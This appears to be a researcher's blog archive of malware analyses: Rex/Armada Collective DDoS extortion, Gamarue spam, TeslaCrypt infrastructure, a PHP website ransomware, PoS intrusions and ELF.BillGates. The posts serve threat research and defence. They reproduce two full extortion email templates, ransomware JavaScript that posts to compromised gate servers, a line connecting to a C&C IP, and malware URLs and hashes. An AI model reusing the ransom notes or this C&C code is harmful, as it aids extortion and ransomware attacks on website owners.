The most curious feature of the malware is called RansomScanner. It is used to retrieve admin contacts of the infected website, and send a DDoS threat email. Below, the email template:

Armada Collective <armada.collective@gmail.com>
FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

It’s a well-known template used by the crooks of Armada Collective. Lot of people have received this kind of email. Cloudflare wrote a blogpost about this ransom note.
There is a supposed gang that sends extortion email to online businesses but nobody has seen any real DDoS. Unfortunately, this kind of scam seems works.

In spite of the lack of actual DDoS follow through, it appears that many victims are paying the extortion fee. A security analyst from the Bitcoin analysis firm Chainalysis studied payments sent to the Armada Collective’s Bitcoin addresses and concluded that more than USD$100,000 has been sent to the attackers by victims.

An example of StackExchange post:
sof
But things starts to be different…

DDoS

Armada Collective emails look like hoax, BUT, we have seen infected servers that actually run real DDoS attacks!
DDos1

Armada collective seems to start a new strategy and try to launch real attacks. The “1Tbps” threat seems ridiculous but If the botnet grows leveraging on fresh vulnerabilities, it may become more harmful.

In the recent versions of Rex, the ransom note has been updated:

FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, we will not crash it at the moment to try to minimize eventual damage, which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Now, crooks talk about a 15 minutes testing DDoS. They ask checking logs as a proof. They want to be taken seriously.
Rex looks like a kind of strange webserver-ransomware that didn’t encrypt files but lock access to administration page and threat to DDoS.

Conclusion

Linux botnets continue to evolve and become very interesting. In this case, what looks like at first sight a Drupal locker is in fact a complete botnet, still in development, with many features.
In the nexts write-ups we will try to explain each module of this botnet.
As usual the attack vector is not 0day but well known vulnerabilities, so I’ll conclude this article like other:
If you are a website administrator, DO NOT LEAVE OUT OF DATE SERVICE ON THE INTERNET.

Samples:

9070f56651f44ec722e17df67b8a954888e387a8f2574594c80937d0f39c471a  .0LD5dVbuo9
bf211d46551079e7f7646ffd6bfda065f1307ea81508d1625b5c65005d929cb3  .0OHjeERDbv
550b9b4c5b2dbe83fa3e227cca65b9b9768e2ea597c2e109205dba51faee5869  .0OhoU6US1m
677464da2fcf73b9793daca3191501da02957af08a6471a047410ce99ea49405  .0r4mKMUlJ6
69402f4bd7718a3403f1caaaa387edc70b299f6aecc06de39e3a9ac28873a184  .0rqNlrPujv
32c921dd4b755af519f648102098735a569a0326a79a911eb47174bd058e5c43  .0YOtp0GQMk
52bf6ae8fe7a0a59ca8d089444207c173e20a7a11c8b5e815b937e2f4224da4f  .1ZRhWKqTlY
950cd068d9c51b941bdfe4721a3156af15dc408d2df23c1f2bc41b87159b109e  .3v0UwARWmv
1f4d876b17a6d786aa793b9c529235f9f9e164d70a74d8d26ca850d18f1329a7  .3weUyhjJZe
09f1967e97a97a1d0963a84823fa2611b9555866f09d7a04bb69bc4d877f9631  .42wVPcdaFD
3e4cebd60a1d6a6b29bac68ace2547c2e3894a0e5865dd90aff5764f8e7dc16d  .4JkeqTzZSX
dcd0e1586630bc8c50fe600899bee76b853057fd9158ed541d7ddec53c8f2186  .5Ygi9nGrHn
cb42573e36fb148bc1109229a1025cdcb375c166361605f0681da9e54e3ef81d  .5ZFxAbOeBY
08ab4abd017568142d061ffd5a2592a491730dddb4485211fda53f39d43e3efb  .7RCBTpSOUh
ac36c87cacbe1b8327fae3084ebd1740a3a5c6c6f208c1c77da56932a9ca3be6  .7tsPagH3FM
d67ae5639618a3409711377e124ef2c6293200aa3026b8b2996654db63645481  .9bKas738kc
a1610e735042ce0197859e6fd7772039e63efce78d6c9cf642492d1c8f1d7540  .9G97ZhwNer
07dd2c7be7a0becb178967c43684c1a687deb217e87575d18fd6b73dc988bd78  .9MgvdLBtL0
dbc3f96fcbbfd90f877dc11fcdedca1c1e574b951ac70edc3160ed9f389c3fd3  .aH7HRrz554
8e7eaed42f50c865f72f7351b87a988de5aa94781b4dab4ddbe993872435f293  .bM04ITZnuq
97c1ed3d52d663f9bad2eef716169f06053dc2bcf8e3d857b0a702e8fae546c9  .C91EZKVz6Q
a1000d4cb81cfb7dfac660722938f3d9c7cb6e36c33e129097ddd29f3dfd1890  .cOVyPvf01L
9f568df46838872b389628b665940415d897823b2e1804e2625c3dfb0b6850b4  .D90yb8KdDV
cc01ba0825208402b0fc2eb62146e856f69d1e9f53b745d8f068f0d09e6170c0  .E61NBnYjak
40c882738ea1e01cc4e8027dd6ce5d55552e5630c8f65e86db630fca09d85fa9  .EETl2pJOf9
0e6c53797964b611c867cb5e5b492d45edf5472924c9a60a99433240f1712f15  .eLBaxwiu2d
c79d7b2a8caf5cc19a019772053c54d1ec02f8ae15b577bbbbd9bf82f19caedb  .fkmJQOIqYB
d097f55f82e88a32b057010c96f553aa7c8ccef12c2a8484aab0fb3dab9d4a0f  .H4g8bASf8Y
c058d576a108bdcf637a6ed399b4d9a1e3bbb6f194882ffada01b85e79109f65  .HdUykUNGy8
339eaabda43fbf0ee0caa6021a999d383713498911523d2b21e2ee2f1541f78f  .Ju7XqX36yy
3dee377037f7fcfd6539c23bb1cdc6eda46680c8773525b784150c1237788965  .KDnA4yWrGc
9d41dc182dee0690e5c5f08f9276548a85f4b986478fd30ec4208d95d54cffeb  .KzmJO5vHRQ
b30dfa13f8dc7162f3edb43dff8507f82c01bd5bd6e5a1ae2e3b2e55dd6b10c0  .LqZzmAJcjo
f7bc5d56312ae6205b21aa4c72708383716907754b037013f47bc88203fbb450  .Oer60jCsoB
9909910d6e008e15c98d26e214f619a7a82787137158784998d99b5c03cbe8f2  .OiZhEG9cEu
2549560970bb8ebca0136f7d6c8111196295d083c6fd6101a7f9178089502cc0  .q7hsioOPWv
fe2c837d1662ca47ebd86c0cf0a3a382ee589bce6b77dabae30801d71a7d280f  .rG47yPBz5p
67a3b5d1fb946daccd7f3562e35b90537f9032184a0605cc9b8613c91a4ea1be  .RnKtruJM9f
22a578f2d30f316d441b73efbeaa0b53641686d2fa75ad44d4d3992da9ceaf5f  .SzIYofKRTz
0723de24bc86eedde149c53e0f93a18596bed424e823f1b46c2f97e358931b83  .YPuels1RDm
6b46b6eff4be06d47284492fed7f71c53103bfaa610952151bddebb8046a34f1  .yYRSdRs6kH
9bd1d3a567e2036f8e57745dd81333911b06a34f4ed6d7d68daa674aac0d7b96  .Zw64nQ52IX

 

Gamarue loves malicious JavaScript too

A deep look inside a recent campaign

In malware ecosystem, there is some old malware families are able to adapt their propagation methods and successfully continue to infect many users. It is the case of Gamarue (Aka Andromeda). I will explain here how this new Gamarue campaign spreads via malicious JavaScript in emails spam.
Early in April, I have been poked via Twitter regarding a spamming campaign in progress:
twi1
tw2
Yet another malware dropped via emails and malicious JavaScript. The binary dropped is:
https://www.virustotal.com/en/file/6adecfaec434b41ecce9911f00b48e4e8ae6e3e8b9081d59e1b46480e9f7dbfc/analysis/1459790694/.
Emails containing zip archive in attachment constitute the attack vector. This archive contains a JavaScript file which downloads and executes a payload hosted on the Internet: this payload is a good old Gamarue.

Gamarue / Andromeda

Gamarue (or Andromeda) is a well-known modular malware. Basically, Gamarue is a dropper which drops different modules. Since it is possible to easily develop a new module, Gamarue is loved by crooks.
Don’t worry, this article is not another Gamarue analysis. A lot of great articles are already available https://blog.avast.com/andromeda-under-the-microscope http://resources.infosecinstitute.com/andromeda-bot-analysis/ http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis
I’m not a big expert of Gamarue, so I have some difficulties to identify the version of the malware. For those who can help, the C&C communication requests looks like:
cc
This template doesn’t match the usual version (https://www.botconf.eu/wp-content/uploads/2015/12/OK-P07-Jose-Esparza-Travelling-to-the-far-side-of-Andromeda-2.pdf)
botconf
Here are some of the features of the packer found in this version of Gamarue.

AV detection

The packer tries to detect if an Anti-Virus is installed on the victim’s computer. To do this, the malware uses the function ZwQuerySystemInformation with the parameter SystemProcessInformation (0x5) to retrieve the process list and checks for the presence of one of the following processes:

  • dwservice.exe (DrWeb)
  • defenderdaemon.exe (Shadow Defender)
  • spiderui.exe (DrWeb)
  • spidernt.exe (DrWeb)

 

VM detection

Gamarue packer tries to know if it is being run in a virtual environment by checking (as this is done for AV detection) if some processes are running:

  • vmacthlp.exe (VMWare)
  • vboxservice.exe (Virtual Box)
  • vboxtray.exe (Virtual Box)

It also attempts to load some DLL to detect if running in a virtualized environment:

  • VBoxHook.dll (Virtual Box)
  • VBoxMRXNP.dll (Virtual Box)

And finally, it checks if the VMWare tools directory exists:

  • C:\program files\VMware\VMware Tools

 

Anti-analysis

To complicate the dynamic analysis, the packer is looking for some tool process:
– taskmgr.exe (the built-in Windows task manager)
– procmon.exe (Process Monitor)
It also enumerates all Window title too and looking for the strings:
– HTTP Analyzer
– Sysinternals
– capturing from Wireshark
– TCPViewClass TCPView
– task manager

After the unpacking process, Gamarue launches C:\windows\system32\lsass.exe (either with CreateProcess or WMI) and injects a rogue DLL inside the process.
This DLL is used to communicate with C&C and drops all 3 modules:

  • Pony, a well-known stealer. This module steals sensitive data like FTP credentials, bitcoin wallet, browser credentials…
  • Hioles, a malware that acts as a proxy on the victim’s computer in order to stealing webmail information (steal Hotmail credentials for example).
  • A mail spammer.

To better understand this campaign, we need to grab some information around this sample. To do that, we need to take a look inside the C&C server to find something useful.
data

Data exploration

I try to grab useful data by “guessing” the web server of the C&C found inside the original binary: I try to find sub directories which are available and maybe find directory with the option “directory listing” enabled. After some guessing I’m able to identify some interesting contents inside the C&C web server:

Stolen Data

report2

report1
In two different directories, I’ve found a lot of text files which contain stolen data. These data are related to email accounts and look like Hioles exfiltrated datas.
mails

Pony panel

As seen in the original sample, a Pony module is used. I’ve found the control panel of the module in a subdirectory of the web server
pony
You can find a lot of information on the Internet about pony http://www.xylibox.com/2013/05/pony-19-win32fareit.html
As we can see here, the attacker is running a malware campaign to grab stolen credentials.

ProxyCB Control panel

In another directory of the web server, I can find a PCB control panel. PCB is used to manage a botnet of proxies. You can find more information at https://www.virusbulletin.com/virusbulletin/2014/03/proxycb-spam-proxy-under-radar
Some screenshots inside the control panel:
pcb1

pcb2

pcb3

JavaScript obfuscation script

In the root directory of the C&C, I’m able to find a PHP page which displays obfuscated JavaScript in a text area:
js
This page may have ‘debugging’ purposes and a different script is generated each time the web page is refreshed.
Since this JavaScript is the same as the malicious attachment originally received by email, it should be related to the JavaScript payload obfuscation; we are on the right track…

The spam kit source code

u
Finally, I’ve found a browseable directory that contains all I need to understand how this Gamarue campaign works.
The archive 1/5.rar and nnn.rar contain a huge database of email addresses to spam.
Sendmail.rar is the source code of the spamming kit.
The other text (.txt extension) files are part of the spamming kit.
Let’s analyze the spamming kit inside sendmail.rar.
sendmail
Let’s have a look at the binaries:

  • KWK.exe

kwg
It is a software used to generate keywords http://newox.ru/kwk.php. We can imagine that this software generates keywords used to craft random emails for the spamming campaign.

  • VPSProxy.exe

vps
VPSProxy is a software created to manage a list of proxies. These proxies are infected website (CMS). The attackers upload a malicious PHP script on the compromised CMS servers and use them as proxies. It is really useful to be hidden when you are a crook :).
The PHP source code of the script uploaded on compromised host can be found at: https://pastebin.com/4kXhLtGh
In the archive sendmail.rar, VPSProxy is configured with a list of 179 compromised hosts.
vpsconf
I’m not able to find the binary in charge of sending spam like in the TeslaCrypt case (https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/). It seems that this spamming process is different.
I’ve looked inside the other file of sendmail.rar and found the code source of the spamming kit, from JavaScript obfuscation to mail sender.
For those who are interested, I put the readme on pastebin (https://pastebin.com/UWFR77C9).
The whole kit works around the file send.php.
send1
As first, the script checks if the option « jscode » is enabled. If yes, the script loads another script: jscode.php.
send2
Jscode.php is the script in charge of the JavaScript obfuscation.
send3
It takes the clean JavaScript code as input. In this case, it is a JavaScript script in charge of downloading 3 binaries, copying them in the %TEMP% directory and executing them, a classic schema of these last months. This JavaScript script is obfuscated through random string generation.
After obfuscation, let’s go back into send.php. The script crafts random emails based on information found in all the txt files (sender email, subject, message, etc.).
send4
For example:

  • The email template:

mail1

  • The subject template:

mail2

  • A list of fake name:

mail3

  • A list of fake source email addresses:

mail4
To send spam, the script is not using compromised SMTP server as TeslaCrypt does (https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/). This time, the script uses a list of compromised websites on which an attacker have uploaded a malicious PHP script. The kit contains a list of 14179 compromised hosts (the huge majority are WordPress websites).
wp
The malicious script used to send mail (via the mail() PHP function) is available at : https://pastebin.com/8W6FXnZz.
Finally, online, this spamming kit looks like:
up
In sendmail.rar we can also find a standalone PHP script, update.php, used to automatically deploy the spamming kit.
date
We now have all the information needed to follow with attention this campaign with free tools like malwr.com (looking for ‘ .zip’ recently submitted files):
malw

Conclusion

Yet another malware campaign with malicious JavaScript and compromised CMS.
wpmeme
Abandoned WordPress sites is a real security problem. Administrators leave online old WordPress web sites during several years. If we look at the number of vulnerabilities in WordPress plugins, it becomes very easy to create a list of several thousands of compromised WordPress sites. In each recent malware campaign, old WordPress sites were involved (Locky, Dridex, TeslaCrypt and now Gamarue…).
I’m really fed up with this situation but there is no real solution.
As a reminder, to protect the endpoint, you can change the default program to execute ‘.js’ files to execute notepad.exe instead of wscript.exe. This prevents the script from being erroneously executed by a user.
Some points in conclusion:

  • DO NOT OPEN UNKNOWN EMAILS.
  • JavaScript file is NEVER (NE-VER) USED as a format for an invoice (NEVER, REALLY!)!
  • If you are a website administrator, DO NOT LEAVE OLD WORPRESS SITES ON THE INTERNET.
  • And, if you are a crook, allowing directory listing in your web server is a really a good idea for investigation.

sno
I would like to thank @F_kZ_ @dvk01uk @JAMESWT_MHT @Techhelplistcom @MalwareTechBlog @malwrhunterteam and @malwaremustdie for their help during this investigation.

Let’s ride with TeslaCrypt

As you can see, we have been working on ransomware over the past few days. This time, we are talking about TeslaCrypt.
TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analysis are already available on the Internet.
In this article we are focusing on two aspects of TeslaCrypt:
– The attack vector
– The web callback

Attack Vector – Bombila

Early in February 2016, Xylitol added an unknown panel on cybercrime-tracker.
cct
After some research, we have found a binary file hosted on the server at the following address: hxxp://78.47.198.134/1.exe.
https://www.virustotal.com/en/file/6aa5fd384fbfe271a5000397e2e0c9d9e06dd5d041488e4f2de7ae3a4eb1589d/analysis/
This binary file is a bot which sends spam. It uses a list of compromised SMTP servers contained in the file hxxp://78.47.198.134/header/m.txt.
This file (781 MB) contains around 4000 compromised SMTP accounts (Orange, SFR, Telefonica, Yahoo, Gmail, etc.).
After that, the binary file retrieves a list of e-mails from hxxp://78.47.198.134/go_mails/botid-*****.txt.
Directory listing was enabled on this directory, so we could find 139 text files for 792 256 e-mails.
1
The spam bot also retrieves some texts for crafted e-mails via several files in hXXp://78.47.198.134/header/. For example, some fake names: https://pastebin.com/3Xnn7krB and random text like:
plastic
Finally, the bot retrieves malicious attachments from the directory hXXp://78.47.198.134/go_attach/*****.zip. 200 zip files are waiting in this directory.
These Zip files contain malicious JavaScript droppers, each one dropping the TeslaCrypt ransomware.
3
Everyone has seen this type of attachment for the last few months in their mailbox.
Here is an example of these malicious droppers: https://www.virustotal.com/en/file/5acfac853e4ad0280be2bd44e4afb79d16cc7f5b4fd6ef45dde0007104f92c42/analysis/ https://pastebin.com/0jzGQdYe
This JS drops Malicious (TeslaCrypt) binary file from:
hXXp://helloguysqq.su/85.exe
hXXp://sowhatsupwithitff.com/85.exe
These servers are known for spreading the TeslaCrypt ransomware: https://www.virustotal.com/en/domain/sowhatsupwithitff.com/information/
When spamming, the binary file writes a lot of logs on the infected machine, such as:
17
And now let’s go to the funny part. After some guessing, we found an archive at hxxp://78.47.198.134/1.zip. This zip file (size: 468 MB compressed, 2 GB decompressed) is a full backup of the server. It contains all the files of this spamming server: source code, logs, payloads, etc. 5
For example, the source code of the spammer bot callback: https://pastebin.com/b9VWb5bk or index.php: https://pastebin.com/Tkh3UGfE.
This archive contains also 45 millions of e-mails in different text files.
This overview allows us to have a better understanding of how TeslaCrypt ransomware is spread. We can suppose that crooks carrying spam campaigns are different than the ones which manage the ransomware.
I would like to thank the CERT Orange for their work and MalwareMustDie for their support.

TeslaCrypt – Web callback

Now, let’s talk about a not really documented part of the ransomware: the callback web.
When a machine is infected by TeslaCrypt, the malware sends some data to a web callback on a compromised server. For example:
hxxp://biocarbon\.com.ec/wp-content/uploads/bstr.php
hxxp://imagescroll\.com/cgi-bin/Templates/bstr.php
hxxp://music.mbsaeger\.com/music/Glee/bstr.php
hxxp://stacon\.eu/bstr.php
hxxp://surrogacyandadoption\.com/bstr.php
hxxp://worldisonefamily\.info/zz/libraries/bstr.php
(thanks to @techhelplist https://www.virustotal.com/en/user/techhelplist/ )
This callback is just a gateway to the real C&C hosted in TOR.
The source code of such a callback is available at: https://pastebin.com/d7CvSpF0
Firstly, the page kicks IP from Microsoft:
6
After that, the callback creates a file most.txt and logs all data received from infected machines in this file.
7
This file looks like:
data
These data are also sent to three TOR callbacks:
gate

http://dd7bsndhr45nfksdnkferfer.javakale.at/
http://dd7bsndhr45nfksdnkferfer.javakale.at/

In the TeslaCrypt web kit, we can see another file named « cron.php » (source code available at: https://pastebin.com/LmtPT24L )
The code compares three variables $_REQUEST[‘password’], $_REQUEST[‘re_password’] and $_REQUEST[login’]. The aim of this code is still unclear.
This information is perfect to follow the infection rate of TeslaCrypt. After grabbing most.txt file from different callback, we were able to do some statistics on a little part of this campaign:
– We retrieved 30 210 data raw:
– 15 290 unique IP addresses (due to NAT, one IP address can return several infected machine)
– 40 TOR exit node : )
graph
We can see that the most affected countries are Republic of Korea and Turkey. The whole statistics are available at https://pastebin.com/rpguyaZm.

Conclusion

We looked at another face of the TeslaCrypt infection: the attack vector and the web part. Both were interesting to analyse.
These data are always interesting for estimating the infection rate of a campaign. The logged files show us that the infection rate is quite high, ransomware is definitely a lucrative business.
The web part of ransomware is often forgotten; with different articles we will try to better understand the whole picture.
64552637

bkp

A lockpicking exercise

A malware calling itself « CTB-locker » is spreading over some websites since the 12th of February 2016. This campaign is different to classical ransomware attacks that focus only on workstations, at first sight, CTB-locker seems also to focus on websites in order to encrypt all files located in the server.
I found this campaign by accident. During an investigation, I retrieved a malicious binary file from hXXp://www.klingenberg.it/IMG0503405025-JPG.scr. In order to understand the context, I visited the homepage of this server and landed to this rather scary page:
1
The ‘Decrypt’ button browses to a page offering to decrypt two of the lost files for free:
2
If the website administrator worries, a chat with the crooks is even possible!
3
I was not aware that CTB-Locker was also attacking websites?! It was time for further investigation.
With the help of some search engines, I was able to found a lot of websites with the same homepage:
4
It seems that an attack was ongoing. To help, you can find a list of these websites on Pastebin: http://pastebin.com/UyXFSL3M
Quickly I was able to found 102 websites infected by this « CTB-Locker ».
Javascipt explains something interesting in their homepage (index.php):


admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"domain="+domain, function (data) {
[..]

$(‘#decrypt’).click(function() {
post_admin(“decrypt=”, function(data) {
[…]


$('#dectest').click(function() {
post_admin("dectest=secret="+($("#secret").val()), function(data) {
[...]


$('#sendmsg').click(function() {
msg = "msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=secret="+$("#secret").val()+msg, function(data) {
[...]


$('#recvmsg').click(function() {
post_admin("recvmsg=secret="+$("#secret").val(), function(data) {
[...]

As we can see, POST requests are sent to other second-level servers, that we will call “gates”, in order to decrypt the files:
admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];

I compiled a list of gate servers from the infected websites on Pastebin as well: http://pastebin.com/E9NcvL4v
Even if it is not confirmed, we can suppose that this ransomware works in this way:
5
So, it’s time for my favorite game: finding a sample.
The original victim server, klingenberg.it, seems to be a good starting point: this server should be full of vulnerabilities because it hosts malware like CTB-Locker ransomware.
After some research, I found an unprotected webshell already running on the server:
6
Thanks to this webshell, it is really easy to grab the files related to CTB-Locker. And now I’m sure: this ransomware uses only PHP scripts.
First, let’s have a look at the root index.php file (available at http://pastebin.com/vdBrtrt3 ).
This ransomware is composed of several files:
A directory named « Crypt » containing a bunch of self-explanatory PHP scripts:
– AES.php
– Base.php
– BigInteger.php
– Hash.php
– Random.php
– Rijndael.php
Along with the index.php main page, other files are relevant to this ransomware: allenc.txt, test.txt, victims.txt, extensions.txt, temp, robots.txt and secret_XXXXX.txt.

The encryption process starts when a malicious user generates a specially-crafted POST request to the index.php page:
encrypt_files($victims, $_POST['submit'], $_POST['submit2']);.
Function enc_excluded in index.php is used to exclude the previously core ransomware files (just to be sure the malware will not encrypt itself!).
The list of files to encrypt is computed in the function get_files. Directories are recursively crawled and the list of files to encrypt (in AES-256) is written in the file named victims.txt.
The files are chosen based on their extension. The list of extensions to keep is contained in the file extensions.txt:
7
This list of files is then sent to the function encrypt_files. This function selects two files in this list and writes them to test.txt.
These two files are encrypted by a first key (“submit” variable in the POST request) and can be decrypted for free using the feature “We give you the opportunity to decipher 2 files free!”.
The other files are encrypted with another key (“submit2” variable in the POST request) and this list is written in the file allenc.txt.
In order to uniquely identify the infected server, the ransomware uses a unique secret computed as characters 2 to 10 of the MD5 hash of the strings : “djf33”+the hostname (ex: md5(djf33www. klingenberg.it))

$secret = substr(md5("djf33".cur_domain), 2, 10);

When the user clicks on the button « Decrypt », a request is sent to the gate servers:

admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"]; via la variable decrypt=

If the user has correctly paid, a popup appears with the contents:
« Your decryption key is XXXXXX » and index.php is reloaded with the correct POST parameters:

window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];

Loading this page with these parameters decrypts the files.
Servers hosting the access.php page are in fact compromised servers. So, if I want to reach the C&C server, I need to have a look at the code of access.php .
I managed to get a hand on an access.php file whose content is available at http://pastebin.com/6WX3JWXg
The C&C address is hard-coded in this page:
$result = socket_connect($sock, "95.215.45.203", 9338);
A socket is opened and waits for some commands such as:
– “Vic” for decrypting
– “Snd” / “Rcv” for chat feature

I don’t have the code yet behind the socket on 95.215.45.203, but even if I found it, I’ll not release it on the Internet :).

The last question to answer is how the victim websites were infected. I don’t have a clear answer to this question, here are just some elements describing these servers.
Based on the fact that a lot of victims do not have a dynamic website or a CMS, it is difficult to say if the malware uses a well-known vulnerability.
The infected hosts run both Linux and Windows and the majority of them (73%) host an Exim service (SMTP server).
Most of them run a password-protected webshell accessible through the “logout.php” dynamic page.
Some of them are vulnerable to shellshock, but without a deep access on victims’ servers, it is difficult to understand how this ransomware infected hosts.

Like every week for six months, a new ransomware family popped up. This time, servers are targeted and use simple PHP technology to perform their malicious activities.
64552637

bkp
I would like to thanks nl3dee who helped me retrieving the source code of access.php.
All the source code is available at kernelmode.info

Low-cost point of sales (PoS) hacking

Hacking point of sales (PoS) systems is a very trendy topic. A lot of PoS malware can be found in the wild (jackPOS, gamaPOS, Backoff, FighterPOS…). At every big breach of PoS systems, media talk about sophisticated attacks involving high skills and great tools. But sometimes, it can be very easy to compromise a PoS and no particular skills are required to steal sensitive information, such as credit card numbers.
During our investigation, we caught a very interesting case of “low-cost” PoS hacking. This article tries to unveil the inner process of infection.

Everything started with a Win32.Ardamax sample found in the wild. Ardamax is a classical sample which is a commercial keylogger available on the Internet.
After reversing this sample, it appears that the malware uploads data on a FTP server hosted in Germany, on server4you. This FTP can easily be accessed (login and password are embedded in the sample) and contains victims’ uploaded data.
This FTP seems to be used since the 9th of October 2014. The server is full of samples, tools and exfiltrated data.
We cannot publish the original sample, because Server4you has not shutdown the server yet.
Exfiltration server
This repository contains the original Win32.Ardamax sample, malwares (Darkomet, Andromeda, Gorynych…), some memory scrappers to retrieve credit card numbers and websites crawlers scan results.
On the same repository, we can find screenshots, microphone recordings, webcam pictures as well as keystroke recordings for each single infected computer.
Keylog result
Crooks have access to about fifteen point of sales computers as well as to some SCADA systems.

Belgium SCADA
Belgium SCADA
Cinema PoS
Cinema PoS
PoS
PoS
PoS
PoS
PoS
PoS
Brazilian gas pump
Brazilian gas pump

We spent a lot of time contacting CERTs and companies for cleaning computers but day after day new infected point of sales data were uploaded to the FTP repository.
How were crooks able to continuously find new targets to infect?
Amongst uploaded data, some screenshots caught our attention: somebody was using a VNC brute force tool against a large range of IP addresses.


The tool used by crooks can be retrieved from an archive uploaded to the VirusTotal website:
https://www.virustotal.com/fr/file/b6c3445386f053c1cca711c8389ac8b12d05aad46bbfec02d721428442cd2ed5/analysis/1442602500/
It seems they are using infected computers to brute force VNC servers with weak passwords . When a new VNC connection is established, a new payload is downloaded through a regular browser and installed on the newly infected machine. No exploit or sophisticated techniques are employed.

Gorynych installation
Gorynych installation

Once the payload is downloaded, any installed antivirus is configured to ignore it or is even completely uninstalled. This requires administration rights on the computer, but obviously this is quite a common situation on point of sales systems.


This day, it is Gorynych which was spreading: https://www.virustotal.com/fr/file/406c30d40f3837615e3b393edc1d6667213c3d287ec006be6198d68124041d43/analysis/
Last but not least, crooks used compromised computers to administrate the Gorynych panel:



During several days we followed the whole stealing process. Crooks infected point of sales and used mainstream memory scrappers like SearchforCC for credit card numbers exfiltration.
As we can see, there is no need of sophisticated attacks or processes to infect systems. With a little more time, crooks would be able to infect a much larger range of systems. With a short list of 152 weak passwords, an attacker is able to control a lot of point of sales systems. In this case, crooks access from small and medium-sized enterprises to companies with 500 million dollars in annual sales.
This kind of campaign would not be so easy to carry out if:
• Point of sales computers were not directly connected to the Internet;
• Strong VNC passwords were used;
• Administrator accounts were not used to connect to sensitive systems.
This kind of negligence can result in a huge waste of money and a very bad image for the compromised company.

Appendix

Payload found on the FTP site

1edc2a1c19a6deb330f21eb0f70d6161 a.exe
6b5ea21045e2c689f6f00e6979955e29 al.exe
4645b7883d5c8fee6579cc79dee5f683 ares.exe
9d87838b7de92cfa5675a34f11d3e7e1 b1.exe
af13c28f32b47423bfebb98de3a7d193 b2.exe
bf395a47eac637f0b2b765ba91d914c7 b3.exe
af36ed9267379f86fc12cc0cfc43938e bm.exe
57138e9fd20b9b93129ed599062bd379 cn.exe
f8058abb53ae90512b3da787bb25a21e dx.exe
0762764e298c369a2de8afaec5174ed9 fgdump.exe
9e76d363a7f93a2ef22483ce1866e8ee gt.exe
413ba3a4705504e528ce05c095cbc8a5 loader.exe
abd788f868ff4a96b91846dd46c9e701 mircpsy.exe
255daa6722de6ad03545070dfbef3330 mmon.exe
cc074e5542c0daca3d9b261dc642bfaa n.exe
85e5727d23ab417a1d05ce656de358b6 new(1)text.exe
79c8661bd5e69df5bb94032a356adc33 nyf1.exe
f461873a10a4b49197a822db88b707fa PowerGrep4.exe
467dc270f0d0619dbd1dfcc554da5f8b private.exe
10c7cdc821291921a957b94b101524af prv.exe
619e2172359cfff98f3124bdd4d9eeb5 q.exe
7c44933863109c101a52c04544626b7f r.exe
780fe52363ec0745da43fc6776f0be8c Spark.exe
af5aac5ef503c929db12d8e031788321 spy.exe.exe
2976768953979e045c1b5773de29e230 sweet.exe
5f6158cbfc5b2f80ad2ebcbeebfd1562 t2s.exe
30a9088df5a7586ca418cb1600ac8683 x64.exe
ef295b49ac6d6e6a4a43b5af75584830 zip.exe

Related servers

posserverupdate.ddns.net
teamviewer.ddns.net
anjing.no-ip.biz
chiproses.net
maculastudios.com
room402.in
193.84.64.159
212.105.175.93
173.214.168.141

When ELF.BillGates met Windows

If you are used to play with honeypots, you have inevitably met the ELF.BillGates malware. It is a known[1] botnet spread over Internet for 4 years.

In a nutshell, ELF.BillGates is a (Chinese) DDOS botnet with backdooring features. It is a binary file with many behaviors depending on the installation path[2]:

  • Gate 0: Infection Monitor (dropper + persistence)
  • Gate 1: Host (Contact C&C + DDOS features)
  • Gate 2: Backdooring
  • Gate 3: Utility spoofing

The “Elf.BillGates” version targets Linux operating system. We have followed the activities of this botnet for several months and during our investigations we found some versions of a Windows fork of the malware. This article attempts to detail this variant.

